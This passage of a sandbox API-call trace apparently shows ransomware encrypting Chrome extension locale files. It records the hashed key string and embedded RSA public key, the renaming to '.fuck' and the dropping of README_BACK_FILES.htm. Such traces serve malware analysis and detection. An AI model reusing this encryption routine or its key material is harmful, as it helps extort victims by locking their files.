Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), bFailIfExists=0) returned 1 [0250.281] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json", dwFileAttributes=0x0) returned 1 [0250.281] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.gsg")) returned 1 [0250.283] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.fuck")) returned 1 [0250.284] CryptDestroyHash (hHash=0x2985960) returned 1 [0250.284] CryptDestroyKey (hKey=0x2985aa0) returned 1 [0250.284] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.284] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.284] FindClose (in: hFindFile=0x2985d20 | out: hFindFile=0x2985d20) returned 1 [0250.284] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\readme_back_files.htm")) returned 0xffffffff [0250.284] AreFileApisANSI () returned 1 [0250.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.284] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.285] GetFileType (hFile=0x5d54) returned 0x1 [0250.285] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.286] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.286] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985d20 [0250.288] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.288] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.288] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.288] GetLastError () returned 0x0 [0250.288] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json")) returned 0x20 [0250.288] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json", dwFileAttributes=0x80) returned 1 [0250.289] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.289] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.290] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.291] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.293] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.293] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.293] CryptHashData (hHash=0x2985ba0, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.293] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2985ba0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985d60) returned 1 [0250.293] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.293] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.293] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29397c8) returned 1 [0250.294] CryptImportPublicKeyInfo (in: hCryptProv=0x29397c8, dwCertEncodingType=0x1, pInfo=0x2934cf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934d20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934d28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985be0) returned 1 [0250.294] CryptEncrypt (in: hKey=0x2985be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.294] CryptEncrypt (in: hKey=0x2985be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2939850*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2939850*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.294] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2939850*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2939850*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.295] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x104, lpOverlapped=0x0) returned 1 [0250.297] CryptEncrypt (in: hKey=0x2985d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x104, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.297] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.297] CloseHandle (hObject=0x5d58) returned 1 [0250.297] CloseHandle (hObject=0x5d5c) returned 1 [0250.297] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), bFailIfExists=0) returned 1 [0250.301] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json", dwFileAttributes=0x0) returned 1 [0250.301] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.gsg")) returned 1 [0250.303] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.fuck")) returned 1 [0250.305] CryptDestroyHash (hHash=0x2985ba0) returned 1 [0250.305] CryptDestroyKey (hKey=0x2985d60) returned 1 [0250.305] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.305] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.305] FindClose (in: hFindFile=0x2985d20 | out: hFindFile=0x2985d20) returned 1 [0250.307] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\readme_back_files.htm")) returned 0xffffffff [0250.308] AreFileApisANSI () returned 1 [0250.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0250.308] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.309] GetFileType (hFile=0x5d54) returned 0x1 [0250.309] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.310] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.311] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0250.311] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.311] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.311] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.311] GetLastError () returned 0x0 [0250.311] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json")) returned 0x20 [0250.312] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json", dwFileAttributes=0x80) returned 1 [0250.312] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.313] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.315] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.315] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.320] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.320] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.320] CryptHashData (hHash=0x2985ca0, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.320] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2985ca0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985ee0) returned 1 [0250.320] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.320] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.320] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29391f0) returned 1 [0250.320] CryptImportPublicKeyInfo (in: hCryptProv=0x29391f0, dwCertEncodingType=0x1, pInfo=0x2934190*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29341c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29341c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985c20) returned 1 [0250.321] CryptEncrypt (in: hKey=0x2985c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.321] CryptEncrypt (in: hKey=0x2985c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2938ca0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2938ca0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.321] WriteFile (in: hFile=0x5d58, lpBuffer=0x2938ca0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2938ca0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.322] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xfc, lpOverlapped=0x0) returned 1 [0250.323] CryptEncrypt (in: hKey=0x2985ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xfc, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0250.323] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0250.323] CloseHandle (hObject=0x5d5c) returned 1 [0250.323] CloseHandle (hObject=0x5d58) returned 1 [0250.323] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), bFailIfExists=0) returned 1 [0250.331] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json", dwFileAttributes=0x0) returned 1 [0250.332] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.gsg")) returned 1 [0250.334] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.fuck")) returned 1 [0250.336] CryptDestroyHash (hHash=0x2985ca0) returned 1 [0250.336] CryptDestroyKey (hKey=0x2985ee0) returned 1 [0250.336] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.336] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.336] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0250.336] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\readme_back_files.htm")) returned 0xffffffff [0250.336] AreFileApisANSI () returned 1 [0250.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.336] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.337] GetFileType (hFile=0x5d54) returned 0x1 [0250.337] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.338] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: 